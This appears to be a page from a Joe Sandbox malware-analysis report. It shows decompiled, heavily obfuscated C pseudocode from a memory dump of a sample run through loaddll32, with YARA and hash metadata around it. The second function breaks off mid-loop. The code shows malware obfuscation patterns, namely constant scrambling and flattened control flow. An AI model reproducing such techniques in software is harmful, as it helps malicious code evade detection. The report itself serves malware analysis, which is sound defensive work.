Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
API String ID: 0-1313373530
Opcode ID: 868f4d788b1cacf9b2e5d3ab0f4bee7ba9565db259e93e825b73926f655c38a4
Instruction ID: eb0e7b3a29eacf706e709a951da1e2451fce2d90b4bd86e221d01ff654f390fb
Opcode Fuzzy Hash: 868f4d788b1cacf9b2e5d3ab0f4bee7ba9565db259e93e825b73926f655c38a4
Instruction Fuzzy Hash: 2112F2B15093809FD3A9CF21C949A9BFBE2FBC4708F10891DE1D996260DBB58909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 02B3238C, Relevance: 11.7, Strings: 9, Instructions: 428
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E02B3238C(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t472;
				void* _t474;
				void* _t477;
				void* _t481;
				void* _t496;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed int _t507;
				signed int _t537;
				signed int _t548;
				void* _t550;
				void* _t555;

				_v1584 = _v1584 & 0x00000000;
				_v1788 = 0x33fdc0;
				_v1788 = _v1788 >> 6;
				_v1788 = _v1788 + 0xffff8381;
				_v1788 = _v1788 | 0x21bcf8d5;
				_v1788 = _v1788 ^ 0x23bcfbfd;
				_v1744 = 0xdaa9b2;
				_v1744 = _v1744 >> 0xa;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 * 0xc;
				_t496 = __ecx;
				_v1744 = _v1744 ^ 0x00028d02;
				_t550 = 0x854d193;
				_v1632 = 0x7e6112;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x07e103ba;
				_v1716 = 0xd48fca;
				_v1716 = _v1716 + 0x54b9;
				_v1716 = _v1716 >> 3;
				_v1716 = _v1716 ^ 0x00172ea2;
				_v1612 = 0xc953de;
				_v1612 = _v1612 + 0xffff7488;
				_v1612 = _v1612 ^ 0x00c8e870;
				_v1660 = 0xfcf42a;
				_v1660 = _v1660 ^ 0x4c4ed76c;
				_v1660 = _v1660 ^ 0x4cb955ce;
				_v1600 = 0xa6934b;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x00032972;
				_v1604 = 0xac816b;
				_t498 = 0x70;
				_v1604 = _v1604 * 0x21;
				_v1604 = _v1604 ^ 0x16380272;
				_v1696 = 0x6f97e6;
				_v1696 = _v1696 | 0xa083c342;
				_v1696 = _v1696 ^ 0x07d73a4d;
				_v1696 = _v1696 ^ 0xa73f6dc5;
				_v1684 = 0xc2049d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 ^ 0x7749f8a8;
				_v1684 = _v1684 ^ 0x6f051565;
				_v1652 = 0xcc0992;
				_v1652 = _v1652 / _t498;
				_v1652 = _v1652 ^ 0x000062be;
				_v1644 = 0xb03f6e;
				_v1644 = _v1644 | 0x923ba096;
				_v1644 = _v1644 ^ 0x92bf0244;
				_v1596 = 0xe574f1;
				_t499 = 0x34;
				_v1596 = _v1596 * 0x7b;
				_v1596 = _v1596 ^ 0x6e3d68f9;
				_v1712 = 0x56ecc;
				_v1712 = _v1712 | 0x82f65ce8;
				_v1712 = _v1712 ^ 0x3fbbcfe7;
				_v1712 = _v1712 ^ 0xbd43ec0e;
				_v1672 = 0x17149a;
				_v1672 = _v1672 >> 3;
				_v1672 = _v1672 ^ 0x000903bb;
				_v1780 = 0xd02801;
				_v1780 = _v1780 + 0x92b0;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 ^ 0x000a2638;
				_v1680 = 0x58b587;
				_v1680 = _v1680 / _t499;
				_t500 = 0x6c;
				_v1680 = _v1680 / _t500;
				_v1680 = _v1680 ^ 0x000e92c3;
				_v1756 = 0xa3a224;
				_v1756 = _v1756 + 0xffffb0d0;
				_v1756 = _v1756 | 0x22aa770c;
				_v1756 = _v1756 ^ 0xa1e09b61;
				_v1756 = _v1756 ^ 0x83433f26;
				_v1772 = 0x502a69;
				_v1772 = _v1772 + 0xf56b;
				_v1772 = _v1772 ^ 0x45c826e2;
				_v1772 = _v1772 << 3;
				_v1772 = _v1772 ^ 0x2cc29674;
				_v1704 = 0x78c4c8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 >> 0xb;
				_v1704 = _v1704 ^ 0x000284d1;
				_v1636 = 0x5a1a48;
				_v1636 = _v1636 | 0x49fffb3e;
				_v1636 = _v1636 ^ 0x49fe8be8;
				_v1740 = 0xbf037f;
				_v1740 = _v1740 << 0xe;
				_t501 = 0x25;
				_v1740 = _v1740 / _t501;
				_v1740 = _v1740 | 0xccccb3e4;
				_v1740 = _v1740 ^ 0xcdfabced;
				_v1688 = 0x95b1ca;
				_v1688 = _v1688 ^ 0x177e4a6b;
				_v1688 = _v1688 | 0x2f1db7c3;
				_v1688 = _v1688 ^ 0x3ffaee54;
				_v1592 = 0x55c9d;
				_v1592 = _v1592 + 0x6a7d;
				_v1592 = _v1592 ^ 0x0009fe3c;
				_v1628 = 0x3a227c;
				_v1628 = _v1628 + 0x86b1;
				_v1628 = _v1628 ^ 0x003b89cb;
				_v1588 = 0x8f964;
				_v1588 = _v1588 ^ 0xa28705c5;
				_v1588 = _v1588 ^ 0xa2875abd;
				_v1748 = 0xfacc7e;
				_v1748 = _v1748 >> 7;
				_v1748 = _v1748 << 5;
				_v1748 = _v1748 * 0x52;
				_v1748 = _v1748 ^ 0x141cbb89;
				_v1668 = 0x1ea707;
				_v1668 = _v1668 >> 9;
				_v1668 = _v1668 ^ 0x0009aede;
				_v1620 = 0x6a93f9;
				_v1620 = _v1620 * 0x2f;
				_v1620 = _v1620 ^ 0x139d0c16;
				_v1732 = 0xe0254d;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 + 0x8d90;
				_v1732 = _v1732 ^ 0x6e303e8a;
				_v1732 = _v1732 ^ 0x6e36b510;
				_v1764 = 0x8f9e28;
				_v1764 = _v1764 | 0x05ab8c08;
				_v1764 = _v1764 ^ 0x1f734d6b;
				_v1764 = _v1764 | 0x4c44fbff;
				_v1764 = _v1764 ^ 0x5ed9dcbf;
				_v1664 = 0x89ae50;
				_v1664 = _v1664 + 0xffff7042;
				_v1664 = _v1664 ^ 0x008bcf93;
				_v1720 = 0x59414f;
				_v1720 = _v1720 ^ 0xb8de2fa2;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0xc43925a0;
				_v1776 = 0x701ae5;
				_v1776 = _v1776 * 0x2f;
				_v1776 = _v1776 + 0xffff7ac3;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 ^ 0x000eab5b;
				_v1784 = 0xc6ba99;
				_v1784 = _v1784 + 0xffff3dc8;
				_v1784 = _v1784 + 0xfffff02f;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0x17a755e4;
				_v1648 = 0x49cca0;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x7324fd9e;
				_v1656 = 0xf258c2;
				_v1656 = _v1656 >> 9;
				_v1656 = _v1656 ^ 0x0001b893;
				_v1792 = 0x2c7b35;
				_t265 =  &_v1792; // 0x2c7b35
				_t502 = 0x5b;
				_v1792 =  *_t265 * 0xd;
				_v1792 = _v1792 << 2;
				_v1792 = _v1792 + 0x1495;
				_v1792 = _v1792 ^ 0x090f1a77;
				_v1768 = 0xbf4508;
				_v1768 = _v1768 / _t502;
				_v1768 = _v1768 * 0x7b;
				_v1768 = _v1768 * 0x6c;
				_v1768 = _v1768 ^ 0x6d142a82;
				_v1640 = 0xd70bb;
				_v1640 = _v1640 + 0xffffb965;
				_v1640 = _v1640 ^ 0x000d3816;
				_v1752 = 0x745b9d;
				_v1752 = _v1752 >> 0xb;
				_v1752 = _v1752 + 0xde80;
				_v1752 = _v1752 + 0xffff3192;
				_v1752 = _v1752 ^ 0x0008925b;
				_v1760 = 0xacf8cd;
				_v1760 = _v1760 + 0xffff9672;
				_v1760 = _v1760 | 0xf153a794;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x00f89a8f;
				_v1736 = 0x809c29;
				_v1736 = _v1736 + 0xffffec2c;
				_v1736 = _v1736 | 0xf5f6afdc;
				_v1736 = _v1736 ^ 0xe29e6862;
				_v1736 = _v1736 ^ 0x176fe90e;
				_v1692 = 0x187f09;
				_v1692 = _v1692 ^ 0xea03092e;
				_v1692 = _v1692 + 0x8629;
				_v1692 = _v1692 ^ 0xea1b0891;
				_v1616 = 0xdadf05;
				_v1616 = _v1616 >> 3;
				_v1616 = _v1616 ^ 0x001b90e7;
				_v1700 = 0x255f4a;
				_v1700 = _v1700 + 0x19d8;
				_v1700 = _v1700 * 0x77;
				_v1700 = _v1700 ^ 0x1164c06a;
				_v1728 = 0x19a192;
				_v1728 = _v1728 | 0x5ed50fa2;
				_v1728 = _v1728 + 0xffff411c;
				_v1728 = _v1728 | 0x02c614be;
				_v1728 = _v1728 ^ 0x5edf5bbc;
				_v1608 = 0x401b2;
				_v1608 = _v1608 | 0xbe85eb48;
				_v1608 = _v1608 ^ 0xbe8cf33f;
				_v1676 = 0x1ae3ab;
				_v1676 = _v1676 | 0xf7e0dbb3;
				_v1676 = _v1676 >> 4;
				_v1676 = _v1676 ^ 0x0f7cac70;
				_v1724 = 0xfdfaa3;
				_v1724 = _v1724 + 0xbcd0;
				_v1724 = _v1724 | 0x4b62528b;
				_v1724 = _v1724 ^ 0x4bf9131d;
				_v1708 = 0x8383c7;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 + 0xffff26cd;
				_v1708 = _v1708 ^ 0x002bd4f5;
				_v1624 = 0xf208a5;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0xf20fbad4;
				_t548 = _v1584;
				while(1) {
					L1:
					_t503 = 0x5394512;
					L2:
					while(_t550 != 0x36274) {
						if(_t550 == 0x34d5b0c) {
							_push(_t503);
							_t477 = E02B485FF(_v1736, _v1692, __eflags,  &_v1580, 0,  &_v1564, _v1616, 0, _v1700);
							__eflags = _t477;
							if(_t477 == 0) {
								L26:
								return _t477;
							}
							E02B51538(_v1728, _v1608, _v1580);
							_t537 = _v1724;
							_push(_v1576);
							_t507 = _v1676;
							L25:
							return E02B51538(_t507, _t537);
						}
						if(_t550 == 0x37ad1c9) {
							_t537 = _v1624;
							_push(_v1584);
							_t507 = _v1708;
							goto L25;
						}
						if(_t550 == _t503) {
							_push(_v1792);
							_t481 = E02B4017B( &_v1564, _v1776, _t503, _v1784, _v1648, _v1584,  &_v1580, _v1656);
							_t555 = _t555 + 0x20;
							__eflags = _t481;
							if(__eflags != 0) {
								E02B51538(_v1768, _v1640, _v1580);
								E02B51538(_v1752, _v1760, _v1576);
							}
							L14:
							_t550 = 0x37ad1c9;
							while(1) {
								L1:
								_t503 = 0x5394512;
								goto L2;
							}
						}
						if(_t550 == 0x854d193) {
							_t550 = 0x36274;
							continue;
						}
						if(_t550 == 0x9c7608b) {
							E02B50DB1(_v1696,  &_v1044, __eflags, _v1684, _t503, _v1652);
							 *((short*)(E02B409DD(_v1644,  &_v1044, _v1596, _v1712))) = 0;
							E02B3BAA9(_v1672, _v1780, __eflags, _v1680, _v1756,  &_v524);
							_push(_v1740);
							_push(_v1636);
							_push(_v1704);
							E02B52D0A(_v1592, __eflags,  &_v524, _v1628, _v1588, _v1748, 0x2b318bc,  &_v1564,  &_v1044, E02B4E1F8(0x2b318bc, _v1772, __eflags));
							E02B4FECB(_t488, _v1668, _v1620, _v1732, _v1764);
							_t555 = _t555 + 0x58;
							__eflags = E02B3BFBE( &_v1564, _t496, _v1720);
							if(__eflags != 0) {
								_t474 = 0x2f41e48;
								__eflags = _t548 - 0x2f41e48;
								_t503 = 0x5394512;
								_t550 =  ==  ? 0x5394512 : 0x34d5b0c;
								continue;
							}
							goto L14;
						}
						if(_t550 != 0xf62a168) {
							L20:
							__eflags = _t550 - 0x4f1a594;
							if(__eflags != 0) {
								continue;
							}
							return _t474;
						}
						if(_t548 != _t474) {
							_t550 = 0x9c7608b;
							continue;
						}
						_push(_v1788);
						_push( &_v1584);
						_t477 = E02B49774(_v1612, _v1660, _v1600, _t503, _v1604, _t503);
						_t555 = _t555 + 0x18;
						if(_t477 == 0) {
							goto L26;
						}
						_t550 = 0x9c7608b;
						goto L1;
					}
					_t472 = E02B4C387(_t503);
					__eflags = _t472 - E02B4BC6B();
					_t474 = 0x2f41e48;
					_t550 = 0xf62a168;
					_t548 =  !=  ? 0x2f41e48 : 0x95df4e1;
					_t503 = 0x5394512;
					goto L20;
				}
			}

0x02b32392
0x02b3239c
0x02b323a4
0x02b323a9
0x02b323b1
0x02b323b9
0x02b323c1
0x02b323c9
0x02b323ce
0x02b323dc
0x02b323e0
0x02b323e2
0x02b323ea
0x02b323ef
0x02b323fa
0x02b32402
0x02b3240d
0x02b32415
0x02b3241d
0x02b32422
0x02b3242a
0x02b32435
0x02b32440
0x02b3244b
0x02b32456
0x02b32461
0x02b3246c
0x02b32477
0x02b3247f
0x02b3248a
0x02b3249f
0x02b324a2
0x02b324a9
0x02b324b4
0x02b324bc
0x02b324c4
0x02b324cc
0x02b324d4
0x02b324df
0x02b324e7
0x02b324f2
0x02b324fd
0x02b32513
0x02b3251a
0x02b32525
0x02b32530
0x02b3253b
0x02b32546
0x02b32559
0x02b3255a
0x02b32561
0x02b3256c
0x02b32574
0x02b3257c
0x02b32584
0x02b3258c
0x02b32597
0x02b3259f
0x02b325aa
0x02b325b2
0x02b325ba
0x02b325bf
0x02b325c4
0x02b325cc
0x02b325e0
0x02b325f2
0x02b325f7
0x02b32600
0x02b3260b
0x02b32613
0x02b3261b
0x02b32623
0x02b3262b
0x02b32633
0x02b3263b
0x02b32643
0x02b3264b
0x02b32650
0x02b32658
0x02b32660
0x02b32665
0x02b3266a
0x02b32672
0x02b3267d
0x02b32688
0x02b32693
0x02b3269b
0x02b326a4
0x02b326a7
0x02b326ab
0x02b326b3
0x02b326bb
0x02b326c3
0x02b326cb
0x02b326d3
0x02b326db
0x02b326e6
0x02b326f1
0x02b326fc
0x02b32707
0x02b32712
0x02b3271d
0x02b32728
0x02b32733
0x02b3273e
0x02b32746
0x02b3274b
0x02b32755
0x02b32759
0x02b32761
0x02b3276c
0x02b32774
0x02b3277f
0x02b32792
0x02b32799
0x02b327a4
0x02b327ac
0x02b327b1
0x02b327b9
0x02b327c1
0x02b327c9
0x02b327d1
0x02b327d9
0x02b327e1
0x02b327e9
0x02b327f1
0x02b327fc
0x02b32807
0x02b32812
0x02b3281a
0x02b32822
0x02b32827
0x02b3282f
0x02b3283c
0x02b32840
0x02b32848
0x02b3284d
0x02b32857
0x02b3285f
0x02b32867
0x02b3286f
0x02b32874
0x02b3287c
0x02b32887
0x02b3288f
0x02b3289a
0x02b328a5
0x02b328ad
0x02b328b8
0x02b328c0
0x02b328c7
0x02b328c8
0x02b328cc
0x02b328d1
0x02b328d9
0x02b328e1
0x02b328ef
0x02b328f8
0x02b32901
0x02b32905
0x02b3290d
0x02b32918
0x02b32923
0x02b3292e
0x02b32936
0x02b3293b
0x02b32943
0x02b3294b
0x02b32953
0x02b3295b
0x02b32963
0x02b3296b
0x02b32970
0x02b32978
0x02b32980
0x02b32988
0x02b32990
0x02b32998
0x02b329a0
0x02b329a8
0x02b329b0
0x02b329b8
0x02b329c0
0x02b329cb
0x02b329d3
0x02b329de
0x02b329e6
0x02b329f3
0x02b329f7
0x02b329ff
0x02b32a07
0x02b32a0f
0x02b32a17
0x02b32a1f
0x02b32a27
0x02b32a32
0x02b32a3d
0x02b32a48
0x02b32a53
0x02b32a5e
0x02b32a66
0x02b32a71
0x02b32a79
0x02b32a81
0x02b32a89
0x02b32a91
0x02b32a99
0x02b32a9e
0x02b32aa6
0x02b32aae
0x02b32ab9
0x02b32ac6
0x02b32ad1
0x02b32ad8
0x02b32ad8
0x02b32add
0x00000000
0x02b32ae2
0x02b32af4
0x02b32d78
0x02b32da3
0x02b32dab
0x02b32dad
0x02b32de9
0x02b32de9
0x02b32de9
0x02b32dc1
0x02b32dc6
0x02b32dcb
0x02b32dd2
0x02b32dd9
0x00000000
0x02b32dde
0x02b32afc
0x02b32d64
0x02b32d6b
0x02b32d72
0x00000000
0x02b32d72
0x02b32b04
0x02b32cb3
0x02b32ce4
0x02b32ce9
0x02b32cec
0x02b32cee
0x02b32d02
0x02b32d17
0x02b32d1c
0x02b32c89
0x02b32c89
0x02b32ad8
0x02b32ad8
0x02b32add
0x00000000
0x02b32add
0x02b32ad8
0x02b32b10
0x02b32ca9
0x00000000
0x02b32ca9
0x02b32b1c
0x02b32b99
0x02b32bc1
0x02b32be2
0x02b32bef
0x02b32bf3
0x02b32bfa
0x02b32c46
0x02b32c63
0x02b32c68
0x02b32c85
0x02b32c87
0x02b32c90
0x02b32c9a
0x02b32c9c
0x02b32ca1
0x00000000
0x02b32ca1
0x00000000
0x02b32c87
0x02b32b24
0x02b32d56
0x02b32d56
0x02b32d5c
0x00000000
0x00000000
0x00000000
0x02b32d5c
0x02b32b2c
0x02b32b72
0x00000000
0x02b32b72
0x02b32b2e
0x02b32b39
0x02b32b58
0x02b32b5d
0x02b32b62
0x00000000
0x00000000
0x02b32b68
0x00000000
0x02b32b68
0x02b32d31
0x02b32d3d
0x02b32d44
0x02b32d49
0x02b32d4e
0x02b32d51
0x00000000
0x02b32d51

Strings

8&, xrefs: 02B325C4
OAY, xrefs: 02B32812
5{,, xrefs: 02B328C0
M%, xrefs: 02B327A4
|":, xrefs: 02B326FC
J_%, xrefs: 02B329DE
i*P, xrefs: 02B32633
$P, xrefs: 02B323DA
}j, xrefs: 02B326E6

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
API String ID: 0-2024644708
Opcode ID: 6b8a7d4212aa76ceb868f0a3711bf42cbbb000b42bdd9a114ade64d3d094b367
Instruction ID: 95da3bf1678c4a49c65bd9ad2bc62032d4797dca2c7d3172f0f238ea498cb9db
Opcode Fuzzy Hash: 6b8a7d4212aa76ceb868f0a3711bf42cbbb000b42bdd9a114ade64d3d094b367
Instruction Fuzzy Hash: FC3210714093819FD379CF61C58AB9BBBE1BBC4308F50891DE6DA96220DBB18949CF13

Uniqueness

Uniqueness Score: -1.00%

Function 02B4B257, Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E02B4B257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t442;
				void* _t450;
				signed int _t452;
				intOrPtr _t464;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				intOrPtr _t476;
				void* _t511;
				intOrPtr* _t519;
				signed int _t522;
				signed int* _t528;
				void* _t531;

				_push(_a8);
				_push(_a4);
				_v16 = __ecx;
				_push(__edx);
				_push(__ecx);
				E02B4FE29(__ecx);
				_v104 = 0xdca0c2;
				_t528 =  &(( &_v196)[4]);
				_v104 = _v104 ^ 0x20eddded;
				_v104 = _v104 + 0xc1e4;
				_t464 = 0;
				_v104 = _v104 ^ 0x20323f12;
				_t526 = 0;
				_v100 = 0xb7a414;
				_t522 = 0x63dbfd2;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000017;
				_v56 = 0x45a952;
				_t466 = 0x59;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0x18c33027;
				_v188 = 0x2a9354;
				_v188 = _v188 * 0x52;
				_v188 = _v188 + 0xffff09d3;
				_v188 = _v188 ^ 0x657f446d;
				_v188 = _v188 ^ 0x68d207a2;
				_v156 = 0xab48ef;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x16e9b314;
				_v156 = _v156 + 0xffff4dee;
				_v156 = _v156 ^ 0x16e86217;
				_v76 = 0xa04b9d;
				_v76 = _v76 / _t466;
				_v76 = _v76 + 0xffff95c9;
				_v76 = _v76 ^ 0x000bb2f5;
				_v96 = 0x5e9ce7;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0x393b;
				_v96 = _v96 ^ 0x0008104f;
				_v168 = 0x9b8ea1;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x41b76bd4;
				_t467 = 0x4a;
				_v168 = _v168 / _t467;
				_v168 = _v168 ^ 0x00e0763a;
				_v84 = 0x6b9fd8;
				_v84 = _v84 + 0xffff492d;
				_v84 = _v84 ^ 0xc4f61535;
				_v84 = _v84 ^ 0xc49355d0;
				_v92 = 0xe62d26;
				_v92 = _v92 + 0xffffd3ae;
				_v92 = _v92 + 0xba25;
				_v92 = _v92 ^ 0x00e8488b;
				_v176 = 0x224b80;
				_v176 = _v176 * 0x64;
				_v176 = _v176 + 0xbfa2;
				_v176 = _v176 ^ 0x4d1eb270;
				_v176 = _v176 ^ 0x4076c61f;
				_v24 = 0x19cf70;
				_v24 = _v24 ^ 0x9000781e;
				_v24 = _v24 ^ 0x90166967;
				_v88 = 0x46d2d8;
				_v88 = _v88 << 0xd;
				_v88 = _v88 + 0x562b;
				_v88 = _v88 ^ 0xda50dff0;
				_v112 = 0x785cae;
				_v112 = _v112 ^ 0x168a73c4;
				_v112 = _v112 | 0x1d89c9b4;
				_v112 = _v112 ^ 0x1ff91637;
				_v196 = 0xff4614;
				_t468 = 0x5f;
				_v196 = _v196 / _t468;
				_v196 = _v196 + 0x757b;
				_t469 = 0x16;
				_v196 = _v196 * 0x60;
				_v196 = _v196 ^ 0x012524f0;
				_v80 = 0xc3120d;
				_v80 = _v80 | 0x1e4982bc;
				_v80 = _v80 * 0x7e;
				_v80 = _v80 ^ 0x2837c3c2;
				_v120 = 0xd97d0d;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x504;
				_v120 = _v120 ^ 0x2fa67262;
				_v172 = 0x34730a;
				_t142 =  &_v172; // 0x34730a
				_v172 =  *_t142 * 0x22;
				_t144 =  &_v172; // 0x34730a
				_v172 =  *_t144 / _t469;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x5108b0e0;
				_v68 = 0x5410d;
				_v68 = _v68 | 0x0af8be45;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0xafd73693;
				_v40 = 0x3314ee;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x0cc221f8;
				_v148 = 0xdcf092;
				_v148 = _v148 >> 2;
				_t470 = 0x7d;
				_v148 = _v148 * 7;
				_v148 = _v148 ^ 0xc025e338;
				_v148 = _v148 ^ 0xc1a4d56b;
				_v48 = 0x99791e;
				_v48 = _v48 + 0xd07a;
				_v48 = _v48 ^ 0x009468bf;
				_v20 = 0xfa3426;
				_v20 = _v20 * 0x2f;
				_v20 = _v20 ^ 0x2dec6acf;
				_v128 = 0x599df;
				_v128 = _v128 / _t470;
				_v128 = _v128 ^ 0x7679aa05;
				_v128 = _v128 ^ 0x7675df44;
				_v124 = 0xbc7529;
				_t471 = 0x70;
				_v124 = _v124 / _t471;
				_v124 = _v124 * 5;
				_v124 = _v124 ^ 0x00024b90;
				_v140 = 0x23c06e;
				_v140 = _v140 << 8;
				_v140 = _v140 + 0xffff4990;
				_v140 = _v140 ^ 0x23b90b70;
				_v32 = 0x48411;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000cf15b;
				_v28 = 0x8f257d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x00045aca;
				_v72 = 0xc5b926;
				_t472 = 0x25;
				_v72 = _v72 * 0xd;
				_v72 = _v72 + 0x5de2;
				_v72 = _v72 ^ 0x0a0d42ec;
				_v52 = 0xb82feb;
				_v52 = _v52 / _t472;
				_v52 = _v52 ^ 0x000a7562;
				_v192 = 0x93d477;
				_v192 = _v192 + 0x2145;
				_v192 = _v192 >> 9;
				_t473 = 0x79;
				_v192 = _v192 / _t473;
				_v192 = _v192 ^ 0x000494fa;
				_v60 = 0xdd5e00;
				_v60 = _v60 + 0xe8be;
				_v60 = _v60 ^ 0x00d904e2;
				_v116 = 0xf92f20;
				_v116 = _v116 << 2;
				_v116 = _v116 + 0xffff4fca;
				_v116 = _v116 ^ 0x03e480d1;
				_v108 = 0xc8e556;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x9333dae4;
				_v108 = _v108 ^ 0xbb75d6e6;
				_v184 = 0xf22b18;
				_v184 = _v184 + 0xffff5aea;
				_v184 = _v184 ^ 0x0621037b;
				_v184 = _v184 + 0xffff0635;
				_v184 = _v184 ^ 0x06c19238;
				_v36 = 0xa8ef7f;
				_v36 = _v36 + 0xffff4107;
				_v36 = _v36 ^ 0x00ab8625;
				_v44 = 0xa6062e;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xc0ced932;
				_v180 = 0x5e49fc;
				_v180 = _v180 + 0x375b;
				_v180 = _v180 << 2;
				_t474 = 0x74;
				_v180 = _v180 * 0x1c;
				_v180 = _v180 ^ 0x2957b537;
				_v164 = 0x531cb2;
				_v164 = _v164 << 0xf;
				_v164 = _v164 ^ 0x1fcb8a78;
				_v164 = _v164 / _t474;
				_v164 = _v164 ^ 0x014b6a45;
				_v64 = 0x492d9e;
				_v64 = _v64 ^ 0x2124760e;
				_v64 = _v64 ^ 0x216a5ba9;
				_v132 = 0x711783;
				_v132 = _v132 | 0x71acd4bd;
				_v132 = _v132 + 0x97cf;
				_v132 = _v132 ^ 0x71fa50e2;
				_v152 = 0xb0a3b1;
				_v152 = _v152 ^ 0xa6c9b18c;
				_t475 = 0x5e;
				_v152 = _v152 / _t475;
				_v152 = _v152 / _t475;
				_v152 = _v152 ^ 0x0003c09f;
				_v136 = 0xe5fa51;
				_v136 = _v136 + 0xde7e;
				_v136 = _v136 + 0xffffe7ef;
				_v136 = _v136 ^ 0x00ec445b;
				_t519 = _v12;
				while(1) {
					L1:
					_t442 = _v144;
					while(1) {
						L2:
						while(1) {
							L3:
							_t476 = _v160;
							while(1) {
								L4:
								_t531 = _t522 - 0x93283d2;
								if(_t531 > 0) {
									break;
								}
								if(_t531 == 0) {
									return E02B52B09(_v132, _t464, _v152, _v136);
								}
								if(_t522 == 0x6c245) {
									_push( &_v12);
									_push(_t464);
									_push(_t476);
									_push(_v68);
									_push(_v172);
									_push(_v120);
									_push(_v80);
									_push(_t476);
									_push(_v196);
									_push(_t476);
									_push(_v112);
									_push(_v88);
									_push(_v16);
									_t450 = E02B3FA95( &_v8, _v24);
									_t528 = _t528 - 0xc + 0x40;
									if(_t450 == 0) {
										L25:
										_t522 = 0x635125b;
										while(1) {
											L1:
											_t442 = _v144;
											goto L2;
										}
									} else {
										_t452 = E02B3DC1B( &_v8);
										_t522 = 0x4f2b403;
										_t442 = _v12 * 0x2c + _t464;
										_v144 = _t442;
